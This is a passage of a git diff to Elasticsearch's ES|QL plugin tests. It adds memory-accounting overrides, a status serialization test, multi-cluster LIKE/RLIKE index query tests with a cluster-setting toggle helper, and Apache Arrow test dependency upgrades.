sinkOperator = new ExchangeSinkOperator(sinkHandler.createExchangeSink(() -> {})); - final var delayOperator = new EvalOperator(driverContext.blockFactory(), new EvalOperator.ExpressionEvaluator() { + final var delayOperator = new EvalOperator(driverContext, new EvalOperator.ExpressionEvaluator() { @Override public Block eval(Page page) { for (int i = 0; i < page.getPositionCount(); i++) { @@ -340,6 +383,11 @@ public Block eval(Page page) { return driverContext.blockFactory().newConstantBooleanBlockWith(true, page.getPositionCount()); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java index 189ccdb402f94..d820305819a6e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java @@ -46,6 +46,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 1; + } + @Override public String toString() { return "Addition[lhs=" + lhs + ", rhs=" + rhs + ']'; @@ -63,6 +68,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 2; + } + @Override public void close() {} } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java index fb1f7b5422308..3ac7650d4d39a 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java @@ -44,6 +44,11 @@ public Block eval(Page page) { return result.build().asBlock(); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public String toString() { return "SameLastDigit[lhs=" + lhs + ", rhs=" + rhs + ']'; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java new file mode 100644 index 0000000000000..50f3f456f3745 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java @@ -0,0 +1,72 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.operator; + +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.Writeable; +import org.elasticsearch.test.AbstractWireSerializingTestCase; +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; + +public class SampleOperatorStatusTests extends AbstractWireSerializingTestCase { + public static SampleOperator.Status simple() { + return new SampleOperator.Status(500012, 200012, 123, 111, 222); + } + + public static String simpleToJson() { + return """ + { + "collect_nanos" : 500012, + "collect_time" : "500micros", + "emit_nanos" : 200012, + "emit_time" : "200micros", + "pages_processed" : 123, + "rows_received" : 111, + "rows_emitted" : 222 + }"""; + } + + public void testToXContent() { + assertThat(Strings.toString(simple(), true, true), equalTo(simpleToJson())); + } + + @Override + protected Writeable.Reader instanceReader() { + return SampleOperator.Status::new; + } + + @Override + public SampleOperator.Status createTestInstance() { + return new SampleOperator.Status( + randomNonNegativeLong(), + randomNonNegativeLong(), + randomNonNegativeInt(), + randomNonNegativeLong(), + randomNonNegativeLong() + ); + } + + @Override + protected SampleOperator.Status mutateInstance(SampleOperator.Status instance) { + long collectNanos = instance.collectNanos(); + long emitNanos = instance.emitNanos(); + int pagesProcessed = instance.pagesProcessed(); + long rowsReceived = instance.rowsReceived(); + long rowsEmitted = instance.rowsEmitted(); + switch (between(0, 4)) { + case 0 -> collectNanos = randomValueOtherThan(collectNanos, ESTestCase::randomNonNegativeLong); + case 1 -> emitNanos = randomValueOtherThan(emitNanos, ESTestCase::randomNonNegativeLong); + case 2 -> pagesProcessed = randomValueOtherThan(pagesProcessed, ESTestCase::randomNonNegativeInt); + case 3 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); + case 4 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); + default -> throw new UnsupportedOperationException(); + } + return new SampleOperator.Status(collectNanos, emitNanos, pagesProcessed, rowsReceived, rowsEmitted); + } +} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java index 382cfc93bfabf..bcccd2707e7f3 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java @@ -53,6 +53,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, @@ -94,6 +99,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, new FirstWord("test"), driverContext()); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java index b345d8c0b196a..c5f91f05e76b3 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BlockUtils; @@ -42,9 +43,27 @@ public static Iterable parameters() { switch (e) { case UNKNOWN -> { } - case COMPOSITE, AGGREGATE_METRIC_DOUBLE -> { + case COMPOSITE -> { // TODO: add later } + case AGGREGATE_METRIC_DOUBLE -> { + cases.add( + valueTestCase( + "regular aggregate_metric_double", + e, + TopNEncoder.DEFAULT_UNSORTABLE, + () -> randomAggregateMetricDouble(true) + ) + ); + cases.add( + valueTestCase( + "aggregate_metric_double with nulls", + e, + TopNEncoder.DEFAULT_UNSORTABLE, + () -> randomAggregateMetricDouble(false) + ) + ); + } case FLOAT -> { } case BYTES_REF -> { @@ -105,7 +124,8 @@ public static Iterable parameters() { ).asBlock() ) } ); - case NULL -> cases.add(valueTestCase("null", e, TopNEncoder.DEFAULT_UNSORTABLE, () -> null)); + case NULL -> { + } default -> { cases.add(valueTestCase("single " + e, e, TopNEncoder.DEFAULT_UNSORTABLE, () -> BlockTestUtils.randomValue(e))); cases.add( @@ -118,6 +138,9 @@ public static Iterable parameters() { ); } } + if (e != ElementType.UNKNOWN && e != ElementType.COMPOSITE && e != ElementType.FLOAT && e != ElementType.DOC) { + cases.add(valueTestCase("null " + e, e, TopNEncoder.DEFAULT_UNSORTABLE, () -> null)); + } } return cases; } @@ -221,4 +244,16 @@ public void testInKey() { assertThat(result.build(), equalTo(value)); } + + public static AggregateMetricDoubleLiteral randomAggregateMetricDouble(boolean allMetrics) { + if (allMetrics) { + return new AggregateMetricDoubleLiteral(randomDouble(), randomDouble(), randomDouble(), randomInt()); + } + return new AggregateMetricDoubleLiteral( + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomInt() : null + ); + } } diff --git a/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java b/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java index 56ae2fb4119a8..f9f9769929f28 100644 --- a/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java +++ b/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java @@ -98,10 +98,16 @@ protected ByteSizeValue enoughMemoryForSimple() { * all pages. */ public final void testSimpleCircuitBreaking() { - ByteSizeValue memoryLimitForSimple = enoughMemoryForSimple(); - Operator.OperatorFactory simple = simple(new SimpleOptions(true)); + /* + * Build the input before building `simple` to handle the rare + * cases where `simple` need some state from the input - mostly + * this is ValuesSourceReaderOperator. + */ DriverContext inputFactoryContext = driverContext(); List input = CannedSourceOperator.collectPages(simpleInput(inputFactoryContext.blockFactory(), between(1_000, 10_000))); + + ByteSizeValue memoryLimitForSimple = enoughMemoryForSimple(); + Operator.OperatorFactory simple = simple(new SimpleOptions(true)); try { ByteSizeValue limit = BreakerTestUtil.findBreakerLimit(memoryLimitForSimple, l -> runWithLimit(simple, input, l)); ByteSizeValue testWithSize = ByteSizeValue.ofBytes(randomLongBetween(0, limit.getBytes())); diff --git a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java index 4ea413e4fcd3b..b657d74c97d9b 100644 --- a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java +++ b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java @@ -29,19 +29,25 @@ import org.junit.rules.TestRule; import java.io.IOException; +import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; +import java.util.function.Predicate; import java.util.stream.Collectors; import java.util.stream.IntStream; import java.util.stream.Stream; import static org.elasticsearch.test.MapMatcher.assertMap; +import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.elasticsearch.xpack.esql.ccq.Clusters.REMOTE_CLUSTER_NAME; import static org.hamcrest.Matchers.any; +import static org.hamcrest.Matchers.anyOf; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasKey; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.nullValue; @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class MultiClustersIT extends ESRestTestCase { @@ -66,6 +72,7 @@ record Doc(int id, String color, long data) { List localDocs = List.of(); final String remoteIndex = "test-remote-index"; List remoteDocs = List.of(); + private Boolean shouldCheckShardCounts = null; @Before public void setUpIndices() throws Exception { @@ -129,7 +136,7 @@ void indexDocs(RestClient client, String index, List docs) throws IOExcepti } private Map run(String query, boolean includeCCSMetadata) throws IOException { - var queryBuilder = new RestEsqlTestCase.RequestObjectBuilder().query(query); + var queryBuilder = new RestEsqlTestCase.RequestObjectBuilder().query(query).profile(true); if (includeCCSMetadata) { queryBuilder.includeCCSMetadata(true); } @@ -158,12 +165,58 @@ private Map runEsql(RestEsqlTestCase.RequestObjectBuilder reques } } + private boolean checkShardCounts() { + if (shouldCheckShardCounts == null) { + try { + shouldCheckShardCounts = capabilitiesSupportedNewAndOld(List.of("correct_skipped_shard_count")); + } catch (IOException e) { + shouldCheckShardCounts = false; + } + } + return shouldCheckShardCounts; + } + + private void assertResultMapForLike( + boolean includeCCSMetadata, + Map result, + C columns, + V values, + boolean remoteOnly, + boolean requireLikeListCapability + ) throws IOException { + List requiredCapabilities = new ArrayList<>(List.of("like_on_index_fields")); + if (requireLikeListCapability) { + requiredCapabilities.add("like_list_on_index_fields"); + } + // the feature is completely supported if both local and remote clusters support it + boolean isSupported = capabilitiesSupportedNewAndOld(requiredCapabilities); + + if (isSupported) { + assertResultMap(includeCCSMetadata, result, columns, values, remoteOnly); + } else { + logger.info("--> skipping data check for like index test, cluster does not support like index feature"); + // just verify that we did not get a partial result + var clusters = result.get("_clusters"); + var reason = "unexpected partial results" + (clusters != null ? ": _clusters=" + clusters : ""); + assertThat(reason, result.get("is_partial"), anyOf(nullValue(), is(false))); + } + } + + private boolean capabilitiesSupportedNewAndOld(List requiredCapabilities) throws IOException { + boolean isSupported = clusterHasCapability("POST", "/_query", List.of(), requiredCapabilities).orElse(false); + try (RestClient remoteClient = remoteClusterClient()) { + isSupported = isSupported + && clusterHasCapability(remoteClient, "POST", "/_query", List.of(), requiredCapabilities).orElse(false); + } + return isSupported; + } + private void assertResultMap(boolean includeCCSMetadata, Map result, C columns, V values, boolean remoteOnly) { MapMatcher mapMatcher = getResultMatcher( ccsMetadataAvailable(), result.containsKey("is_partial"), result.containsKey("documents_found") - ); + ).extraOk(); if (includeCCSMetadata) { mapMatcher = mapMatcher.entry("_clusters", any(Map.class)); } @@ -251,12 +304,19 @@ private void assertClusterDetailsMap(Map result, boolean remoteO @SuppressWarnings("unchecked") Map remoteClusterShards = (Map) remoteCluster.get("_shards"); - assertThat(remoteClusterShards.keySet(), equalTo(Set.of("total", "successful", "skipped", "failed"))); - assertThat((Integer) remoteClusterShards.get("total"), greaterThanOrEqualTo(0)); - assertThat((Integer) remoteClusterShards.get("successful"), equalTo((Integer) remoteClusterShards.get("total"))); - assertThat((Integer) remoteClusterShards.get("skipped"), equalTo(0)); - assertThat((Integer) remoteClusterShards.get("failed"), equalTo(0)); - + assertThat( + remoteClusterShards, + matchesMap().entry("total", greaterThanOrEqualTo(0)) + .entry("successful", greaterThanOrEqualTo(0)) + .entry("skipped", greaterThanOrEqualTo(0)) + .entry("failed", 0) + ); + if (checkShardCounts()) { + assertThat( + (int) remoteClusterShards.get("successful") + (int) remoteClusterShards.get("skipped"), + equalTo(remoteClusterShards.get("total")) + ); + } if (remoteOnly == false) { @SuppressWarnings("unchecked") Map localCluster = (Map) details.get("(local)"); @@ -267,11 +327,19 @@ private void assertClusterDetailsMap(Map result, boolean remoteO @SuppressWarnings("unchecked") Map localClusterShards = (Map) localCluster.get("_shards"); - assertThat(localClusterShards.keySet(), equalTo(Set.of("total", "successful", "skipped", "failed"))); - assertThat((Integer) localClusterShards.get("total"), greaterThanOrEqualTo(0)); - assertThat((Integer) localClusterShards.get("successful"), equalTo((Integer) localClusterShards.get("total"))); - assertThat((Integer) localClusterShards.get("skipped"), equalTo(0)); - assertThat((Integer) localClusterShards.get("failed"), equalTo(0)); + assertThat( + localClusterShards, + matchesMap().entry("total", greaterThanOrEqualTo(0)) + .entry("successful", greaterThanOrEqualTo(0)) + .entry("skipped", greaterThanOrEqualTo(0)) + .entry("failed", 0) + ); + if (checkShardCounts()) { + assertThat( + (int) localClusterShards.get("successful") + (int) localClusterShards.get("skipped"), + equalTo(localClusterShards.get("total")) + ); + } } } @@ -371,6 +439,159 @@ public void testStats() throws IOException { assertThat(clusterData, hasKey("took")); } + public void testLikeIndex() throws Exception { + + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testLikeIndexLegacySettingNoResults() throws Exception { + // the feature is completely supported if both local and remote clusters support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_on_index_fields"))); + try ( + ClusterSettingToggle ignored = new ClusterSettingToggle(adminClient(), "esql.query.string_like_on_index", false, true); + RestClient remoteClient = remoteClusterClient(); + ClusterSettingToggle ignored2 = new ClusterSettingToggle(remoteClient, "esql.query.string_like_on_index", false, true) + ) { + // test code with the setting changed + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + // we expect empty result, since the setting is false + var values = List.of(); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + } + + public void testLikeIndexLegacySettingResults() throws Exception { + // we require that the admin client supports the like_on_index_fields capability + // otherwise we will get an error when trying to toggle the setting + // the remote client does not have to support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_on_index_fields"))); + try ( + ClusterSettingToggle ignored = new ClusterSettingToggle(adminClient(), "esql.query.string_like_on_index", false, true); + RestClient remoteClient = remoteClusterClient(); + ClusterSettingToggle ignored2 = new ClusterSettingToggle(remoteClient, "esql.query.string_like_on_index", false, true) + ) { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*:*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + // we expect results, since the setting is false, but there is : in the LIKE query + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + } + + public void testNotLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testLikeListIndex() throws Exception { + // the feature is completely supported if both local and remote clusters support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_list_on_index_fields"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE ("*remote*", "not-exist*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testNotLikeListIndex() throws Exception { + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_list_on_index_fields"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT LIKE ("*remote*", "not-exist*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testNotLikeListKeyword() throws Exception { + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_with_list_of_patterns"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE color NOT LIKE ("*blue*", "*red*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + Predicate filter = d -> false == (d.color.contains("blue") || d.color.contains("red")); + + var values = new ArrayList<>(); + int remoteCount = (int) remoteDocs.stream().filter(filter).count(); + int localCount = (int) localDocs.stream().filter(filter).count(); + if (remoteCount > 0) { + values.add(List.of(remoteCount, REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + } + if (localCount > 0) { + values.add(List.of(localCount, localIndex)); + } + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testRLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index RLIKE ".*remote.*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testNotRLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT RLIKE ".*remote.*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + private RestClient remoteClusterClient() throws IOException { var clusterHosts = parseClusterHosts(remoteCluster.getHttpAddresses()); return buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[0])); @@ -387,4 +608,28 @@ private static boolean capabilitiesEndpointAvailable() { private static boolean includeCCSMetadata() { return ccsMetadataAvailable() && randomBoolean(); } + + public static class ClusterSettingToggle implements AutoCloseable { + private final RestClient client; + private final String settingKey; + private final Object originalValue; + + public ClusterSettingToggle(RestClient client, String settingKey, Object newValue, Object restoreValue) throws IOException { + this.client = client; + this.settingKey = settingKey; + this.originalValue = restoreValue; + setValue(newValue); + } + + private void setValue(Object value) throws IOException { + Request set = new Request("PUT", "/_cluster/settings"); + set.setJsonEntity("{\"persistent\": {\"" + settingKey + "\": " + value + "}}"); + ESRestTestCase.assertOK(client.performRequest(set)); + } + + @Override + public void close() throws IOException { + setValue(originalValue == null ? "null" : originalValue); + } + } } diff --git a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java index 4b192b6aef948..c3e29602a8b8c 100644 --- a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java +++ b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java @@ -38,6 +38,7 @@ import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.instanceOf; +import static org.hamcrest.Matchers.is; @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class RequestIndexFilteringIT extends RequestIndexFilteringTestCase { @@ -91,6 +92,12 @@ protected String from(String... indexName) { @Override public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject) throws IOException { + return runEsql(requestObject, true); + } + + @Override + public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject, boolean checkPartialResults) + throws IOException { if (requestObject.allowPartialResults() != null) { assumeTrue( "require allow_partial_results on local cluster", @@ -98,7 +105,7 @@ public Map runEsql(RestEsqlTestCase.RequestObjectBuilder request ); } requestObject.includeCCSMetadata(true); - return super.runEsql(requestObject); + return super.runEsql(requestObject, checkPartialResults); } @After @@ -154,7 +161,30 @@ public void testIndicesDontExistRemote() throws IOException { indexTimestampData(docsTest1, "test1", "2024-11-26", "id1"); Map result = runEsql( - timestampFilter("gte", "2020-01-01").query("FROM *:foo,*:test1 METADATA _index | SORT id1 | KEEP _index, id*") + timestampFilter("gte", "2020-01-01").query("FROM *:foo,*:test1 METADATA _index | SORT id1 | KEEP _index, id*"), + false + ); + + // `foo` index doesn't exist, so the request will currently be successful, but with partial results + var isPartial = result.get("is_partial"); + assertThat(isPartial, is(true)); + assertThat( + result, + matchesMap().entry( + "_clusters", + matchesMap().entry( + "details", + matchesMap().entry( + "remote_cluster", + matchesMap().entry( + "failures", + matchesList().item( + matchesMap().entry("reason", matchesMap().entry("reason", "no such index [foo]").extraOk()).extraOk() + ) + ).extraOk() + ).extraOk() + ).extraOk() + ).extraOk() ); @SuppressWarnings("unchecked") var columns = (List>) result.get("columns"); diff --git a/x-pack/plugin/esql/qa/server/single-node/build.gradle b/x-pack/plugin/esql/qa/server/single-node/build.gradle index 977955ed69e52..ce962ef4c7e74 100644 --- a/x-pack/plugin/esql/qa/server/single-node/build.gradle +++ b/x-pack/plugin/esql/qa/server/single-node/build.gradle @@ -16,9 +16,9 @@ dependencies { javaRestTestImplementation project(xpackModule('esql')) yamlRestTestImplementation project(xpackModule('esql:qa:server')) - javaRestTestImplementation('org.apache.arrow:arrow-vector:16.1.0') - javaRestTestImplementation('org.apache.arrow:arrow-format:16.1.0') - javaRestTestImplementation('org.apache.arrow:arrow-memory-core:16.1.0') + javaRestTestImplementation('org.apache.arrow:arrow-vector:18.3.0') + javaRestTestImplementation('org.apache.arrow:arrow-format:18.3.0') + javaRestTestImplementation('org.apache.arrow:arrow-memory-core:18.3.0') javaRestTestImplementation('org.checkerframework:checker-qual:3.42.0') javaRestTestImplementation('com.google.flatbuffers:flatbuffers-java:23.5.26') javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") @@ -26,7 +26,7 @@ dependencies { javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") javaRestTestImplementation("org.slf4j:slf4j-api:${versions.slf4j}") javaRestTestImplementation("org.slf4j:slf4j-nop:${versions.slf4j}") - javaRestTestImplementation('org.apache.arrow:arrow-memory-unsafe:16.1.0') + javaRestTestImplementation('org.apache.arrow:arrow-memory-unsafe:18.3.0') clusterPlugins project(':plugins:mapper-size') clusterPlugins project(':plugins:mapper-murmur3') diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java index 7cc599945e7c0..3484f19afa451 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java @@ -9,16 +9,27 @@ import com.carrotsearch.randomizedtesting.annotations.ThreadLeakFilters; +import org.elasticsearch.client.Request; +import org.elasticsearch.common.Strings; import org.elasticsearch.test.TestClustersThreadFilter; import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; import org.elasticsearch.xpack.esql.CsvSpecReader.CsvTestCase; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; +import org.elasticsearch.xpack.esql.plugin.ComputeService; import org.elasticsearch.xpack.esql.qa.rest.EsqlSpecTestCase; +import org.junit.Before; import org.junit.ClassRule; +import java.io.IOException; + @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class EsqlSpecIT extends EsqlSpecTestCase { @ClassRule - public static ElasticsearchCluster cluster = Clusters.testCluster(spec -> spec.plugin("inference-service-test")); + public static ElasticsearchCluster cluster = Clusters.testCluster( + spec -> spec.plugin("inference-service-test").setting("logger." + ComputeService.class.getName(), "DEBUG") // So we log a profile + ); @Override protected String getTestRestCluster() { @@ -47,4 +58,14 @@ protected boolean enableRoundingDoubleValuesOnAsserting() { protected boolean supportsSourceFieldMapping() { return cluster.getNumNodes() == 1; } + + @Before + public void configureChunks() throws IOException { + boolean smallChunks = randomBoolean(); + Request request = new Request("PUT", "/_cluster/settings"); + XContentBuilder builder = JsonXContent.contentBuilder().startObject().startObject("persistent"); + builder.field(PhysicalSettings.VALUES_LOADING_JUMBO_SIZE.getKey(), smallChunks ? "1kb" : null); + request.setJsonEntity(Strings.toString(builder.endObject().endObject())); + assertOK(client().performRequest(request)); + } } diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java index 1ef49652c3afc..68c606f2e3fa2 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java @@ -40,6 +40,9 @@ import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; +import java.time.ZoneOffset; +import java.time.ZonedDateTime; +import java.time.format.DateTimeFormatter; import java.util.ArrayList; import java.util.Arrays; import java.util.Comparator; @@ -786,6 +789,117 @@ && isMillisOrNanos(listOfTypes.get(j))) { } } + public void testDateMathIndexPattern() throws IOException { + ZonedDateTime now = ZonedDateTime.now(ZoneOffset.UTC); + + String[] indices = { + "test-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now), + "test-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(1)), + "test-index-" + 